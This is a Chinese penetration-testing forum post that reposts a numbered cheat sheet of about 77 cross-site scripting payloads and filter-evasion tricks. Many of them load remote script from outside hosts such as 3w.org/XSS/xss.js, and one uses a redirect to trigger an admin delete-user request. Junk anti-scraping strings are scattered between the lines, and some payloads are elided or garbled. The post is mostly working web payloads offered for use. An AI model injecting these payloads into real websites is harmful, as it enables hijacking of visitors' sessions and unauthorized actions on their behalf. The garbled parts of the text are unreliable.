中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
4 J4 B( _) M# p( T) P, D& u
(1)普通的XSS JavaScript注入
4 G7 _) `8 X2 n0 _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! [& u; ^! \6 i1 O" L. K1 j
(2)IMG标签XSS使用JavaScript命令
) P" |0 C/ @- C, }* H8 n- x6 \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 l. Q2 }8 r5 J. k- i9 ]1 {
(3)IMG标签无分号无引号
0 u! N6 w6 E6 B0 u6 j
<IMG SRC=javascript:alert(‘XSS’)>
1 a" t$ u5 g* X" X1 ?
(4)IMG标签大小写不敏感
" x+ D- d. ?" ^; N) d- Y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- X/ g9 r4 j8 H" f6 \
(5)HTML编码(必须有分号)
4 \+ P/ d5 h3 ] \5 X* P* U$ F+ f
<IMG SRC=javascript:alert(“XSS”)>
' J6 i3 ^1 S) o9 G0 O) c
(6)修正缺陷IMG标签
& [0 U( W' x9 g5 ~2 x
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
; f& C( d+ Y9 `6 s
/ ^0 M! x+ j3 t+ A
9 Q7 ^# ^. H) R( {/ _% J
(7)formCharCode标签(计算器)
& U& M# W0 b! c* d2 a% Y( v7 `* L
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+ T& n) u0 F/ w: X. W
(8)UTF-8的Unicode编码(计算器)
; V& C( }/ n8 q0 ~! b5 M3 T
<IMG SRC=jav..省略..S')>
3 n$ i3 c, C# \! L; T1 b, D& |3 J
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# ~9 w. A& h7 T S! ]
<IMG SRC=jav..省略..S')>
, r1 q+ s0 G4 s9 i$ y3 v
(10)十六进制编码也是没有分号(计算器)
Y9 k4 n/ p7 S1 O5 [+ ^
<IMG SRC=java..省略..XSS')>
! W. d8 H- u$ E2 t/ E- z
(11)嵌入式标签,将Javascript分开
: c3 D2 ^: x& A9 g9 o0 P1 h
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! g, k6 G+ T9 m0 v- v; B
(12)嵌入式编码标签,将Javascript分开
! f% P3 g! p y7 K; u" {
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( L7 ` a3 k) O
(13)嵌入式换行符
' H. W1 w% {* g9 O/ Q5 d
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, Y6 D: X6 b0 m' Y+ s' f g6 r
(14)嵌入式回车
: l, \: {: ]2 @; r1 g$ L
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 Q0 J' s* O2 g- S; i9 j
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 Y. l2 w- s; E2 ^
<IMG SRC=”javascript:alert(‘XSS‘)”>
+ p3 ?7 ~0 T6 S5 u) q
(16)解决限制字符(要求同页面)
]8 d% K. [0 t
<script>z=’document.’</script>
" d! T, q9 ^! P- |: k* `" _7 W
<script>z=z+’write(“‘</script>
" v G7 Z1 [4 @7 W( G+ V
<script>z=z+’<script’</script>
1 A; N7 S+ M% U- ~& u/ b
<script>z=z+’ src=ht’</script>
+ V% Q4 ^' ], a6 J7 t4 X, L
<script>z=z+’tp://ww’</script>
$ K6 B$ I5 a: F4 W2 A( L
<script>z=z+’w.shell’</script>
2 m+ Y: r# `7 X
<script>z=z+’.net/1.’</script>
) I4 w, |9 H1 T9 ] ~; a
<script>z=z+’js></sc’</script>
0 ~8 B3 p' J" N$ q
<script>z=z+’ript>”)’</script>
9 L8 ^. S! f/ F: R7 ~+ g' `
<script>eval_r(z)</script>
8 |# h( O6 K# \' Z! y
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
: r7 i1 {! o9 k& ~& w
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
2 h) B: G8 F" X7 C$ t9 V3 ~
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ G1 e& e/ u" X1 ?) |" F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
) @8 d- i, @% M% i4 w* |
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( n$ Y. [2 [3 w1 n( L
(19)Spaces和meta前的IMG标签
+ b" D/ K$ Q; w, b+ ~& }4 n% d
<IMG SRC=” javascript:alert(‘XSS’);”>
. }" E$ N" l5 b% T
(20)Non-alpha-non-digit XSS
6 m9 |, J+ q C: W. s
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
0 l* d' t! Y b, z+ h& l
(21)Non-alpha-non-digit XSS to 2
, }) g) T' t) Q4 N6 `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
$ |. T; ]7 O4 ~3 n
(22)Non-alpha-non-digit XSS to 3
) N4 g. @/ v6 {3 w
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
2 }0 t" K- B# `. h! l& z% g# X3 T
(23)双开括号
. O1 W: _; Q1 [ m( k$ T
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
" d) ?3 n6 i1 V" k4 ]4 w# W* g7 ~
(24)无结束脚本标记(仅火狐等浏览器)
8 x7 W3 p2 |2 `$ ?
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! y) c: f# b7 J* q/ m* n
(25)无结束脚本标记2
0 Z4 w" B3 P: _) L' h, J
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 ?4 B3 s. q: O3 g
(26)半开的HTML/JavaScript XSS
0 X. r+ A9 t U+ f% ^' }3 \
<IMG SRC=”javascript:alert(‘XSS’)”
9 \7 C* v( Z, w. Q$ N
(27)双开角括号
2 |% j* e- }7 W0 e( W8 s' q' Q
<iframe src=http://3w.org/XSS.html <
6 }# o+ M: i/ t
(28)无单引号 双引号 分号
: W3 c5 t( p/ x D
<SCRIPT>a=/XSS/
" ]9 {3 I- p, S
alert(a.source)</SCRIPT>
2 _' ^: s0 U9 I1 p" U1 V, P) H
(29)换码过滤的JavaScript
5 d$ A; g; a) L9 b3 z* O# _, _3 l
\”;alert(‘XSS’);//
) D$ m! V/ e& H# w8 B
(30)结束Title标签
+ R( H/ F6 v4 I% v8 ] h2 }
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
# J$ Q. f3 {# }7 n* g
(31)Input Image
5 r2 B% d7 b6 `4 t0 k# ?/ j7 n
<INPUT SRC=”javascript:alert(‘XSS’);”>
# H6 r+ c# }' ^
(32)BODY Image
; d, M: ?' b: }0 n" T/ s
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
) h# k+ ~. k: X7 V; Y/ V
(33)BODY标签
6 X# s0 G0 t) q8 b* y& v2 G. J
<BODY(‘XSS’)>
$ S" l7 p, j6 a) }
(34)IMG Dynsrc
6 T$ I: @7 x2 n
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
: a w4 W% ^- o n' V4 n# ~ }
(35)IMG Lowsrc
( j: r6 q' e: W
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
t! p: l# ?% s
(36)BGSOUND
$ d0 y' o+ ?$ e8 K0 E
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
3 k. _4 R+ G$ a# G
(37)STYLE sheet
$ X: m3 @& A. g& b: `& H( G
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# P; d, X, }4 q! ?# j! h+ [
(38)远程样式表
9 C8 S- g0 @" H" W% B
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
8 s; S% h* p2 \! U* a
(39)List-style-image(列表式)
+ v0 z) `: o! b9 T
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 w3 Y0 l5 h3 ^9 H
(40)IMG VBscript
8 C8 Z$ E4 |1 H+ F; t8 A+ C7 B9 N
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ ?) M- B8 M# u* u
(41)META链接url
+ w( j4 J3 w5 T) |2 y# k8 x
7 b% l/ W7 l' ?
. ]& @5 T. h5 f. A1 G
<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ m0 U# ^" y9 `* y& Z# _
URL=http://;URL=javascript:alert(‘XSS’);”>
^+ B' n2 a( W
(42)Iframe
* l6 f* t( A4 D$ G2 b
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# |; @/ i6 {8 j
(43)Frame
2 f# Z( h" h: q& g j( `' F: O
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
( o/ L9 E' H' B# M
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
$ p. |7 U; P" _+ [, N: m% i
(44)Table
' F0 q# c, k" O5 b/ i _
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 g. b2 C1 i2 _: @- B
(45)TD
" z+ U5 H* ? _3 F
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 X. \$ M1 X: e+ D! f3 I+ g
(46)DIV background-image
3 i: M: y9 G6 s/ b4 P9 @ P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
: l- G5 N% c* \ f) g# Q
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
) R6 G, V/ }, |
8&13&12288&65279)
& V: _* m( l* q" h/ G9 G# r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
: T) n( q5 J) d1 M: [! H3 S# ^: C
(48)DIV expression
- q% {6 W5 s/ z9 T `/ z
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, m) m9 n6 r k) l
(49)STYLE属性分拆表达
% _4 C; h; ]% B
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% s/ |/ ]5 J z* s
(50)匿名STYLE(组成:开角号和一个字母开头)
1 k2 X4 F3 `/ Z3 v% u. I6 X
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
5 D+ n0 J, b. S
(51)STYLE background-image
8 K# K+ W- h" j# K. i
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
' y3 C7 }7 S4 R7 m/ v/ {- T
CLASS=XSS></A>
$ R( ]. {: A' P1 A
(52)IMG STYLE方式
, I) U* L. Y/ ^7 d: f3 U1 R
exppression(alert(“XSS”))’>
2 @1 h' y5 z6 I, O
(53)STYLE background
" J, I4 g$ `; P' D8 M+ \
<STYLE><STYLE
( {0 T" M4 Q3 ^6 s9 y9 g
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
^' _. l7 A, X/ N: F; p; Q B5 U
(54)BASE
( z$ m9 p( r8 a j! @
<BASE HREF=”javascript:alert(‘XSS’);//”>
) q5 N u0 J; t! b
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 d4 ?( v! b# \
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
/ e& I h J4 T2 b1 N
(56)在flash中使用ActionScrpt可以混进你XSS的代码
5 |, K. t8 h; Y! R8 }& t7 H# X
a=”get”;
- m1 L" {1 ~) Q" v# e- ^1 W- R% A; S- m
b=”URL(\”";
# e# i m& q5 {, K* W$ L3 Y+ K
c=”javascript:”;
' V+ ?! c" l3 ^2 v: U9 Z; B
d=”alert(‘XSS’);\”)”;
/ H6 Z$ y6 i+ y& r, l
eval_r(a+b+c+d);
' M) \5 k$ C4 z# p' g( l9 _% W
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
4 d' S9 W, J8 W6 [1 X0 u
<HTML xmlns:xss>
7 u4 z( G% A2 @+ I
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
% a6 Z( B$ a; r3 v" |5 G+ Y
<xss:xss>XSS</xss:xss>
$ }+ I# H* k. r5 H- ~8 | V, n
</HTML>
8 S0 C' O" e, }% v
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* K. w- p# n: b9 h q
<SCRIPT SRC=””></SCRIPT>
0 y1 s$ v% s* P+ c/ @. J0 D
(59)IMG嵌入式命令,可执行任意命令
" G( d) P: {& {, K/ V9 s/ q) Y
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
1 x8 H; b% z! h, O- y9 N
(60)IMG嵌入式命令(a.jpg在同服务器)
( P. M* e9 R4 ]" _& H% [) w- i! F6 C
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
# d; t) m5 \/ f- H3 q( E
(61)绕符号过滤
# L2 f! X# {. p7 B6 J6 R8 s
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
, \3 R w+ W- C4 @1 y; j' N
(62)
, b6 Q1 M; e/ E
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
# M/ | ^/ Y. p
(63)
8 y% b6 e: C4 N; H/ i3 H
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ z+ o% ]& Q, a4 I
(64)
! L" `) a, w: n3 d0 V5 y
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
* Z: d# v' s& B4 r9 d' k! ?
(65)
. b: w+ O3 Y7 C2 ]; e
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
2 C0 n: }8 m; h' _1 J. b) A
(66)12-7-1 T00LS - Powered by Discuz! Board
% t! O0 G* T9 g
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
8 D6 D: d- l/ c. }. g
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
5 ], n; H: p2 Z, w& t' o4 D
(67)
& Z% T* m, m* [& W) q0 v3 H
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
4 U2 ^8 e$ e" V: `) q; W ?
</SCRIPT>
. c1 w- [0 G! e4 H
(68)URL绕行
! n3 @) E5 i+ t/ u
<A HREF=”
http://127.0.0.1/
”>XSS</A>
4 o( }- o. l2 }1 i/ H4 ]
(69)URL编码
$ ]. ~7 P/ u$ z9 b7 @
<A HREF=”
http://3w.org
”>XSS</A>
& G9 ?; t2 ~7 B2 d6 G. h3 s
(70)IP十进制
# S3 j, G' {6 z
<A HREF=”http://3232235521″>XSS</A>
2 |) v" A. G1 Z
(71)IP十六进制
- X, N8 c3 W8 |% M
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
) ~$ Z2 G* V2 ]
(72)IP八进制
7 D" x$ M& y4 B
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
6 D" T7 S4 p+ `, O8 a5 n U( ~
(73)混合编码
. y+ X/ F% N1 Y- E1 A4 s/ ]
<A HREF=”h
( R; }. a! T5 ]9 \
tt p://6 6.000146.0×7.147/”">XSS</A>
% f A# n: k, ~6 ^2 V
(74)节省[http:]
+ A4 e. F5 S% N( n. c% Y4 k
<A HREF=”//www.google.com/”>XSS</A>
: I2 x8 S: C4 d9 L8 J
(75)节省[www]
- m! F) L: T7 p, D8 M. L/ c
<A HREF=”
http://google.com/
”>XSS</A>
J8 X# ?3 L& C4 F
(76)绝对点绝对DNS
) c+ K3 ]$ Z, _
<A HREF=”
http://www.google.com./
”>XSS</A>
& |# B2 P+ h+ B- \3 Y, V
(77)javascript链接
; h8 l% _5 [+ l8 [
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
; @6 H* t+ n- m5 |6 ~
% M% T2 p5 ]. y9 u" R! x7 m
原文地址:
http://fuzzexp.org/u/0day/?p=14
$ S4 e1 W, T* G8 ]- |) R/ E
% M4 D; R& c1 m* `0 i. y1 y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2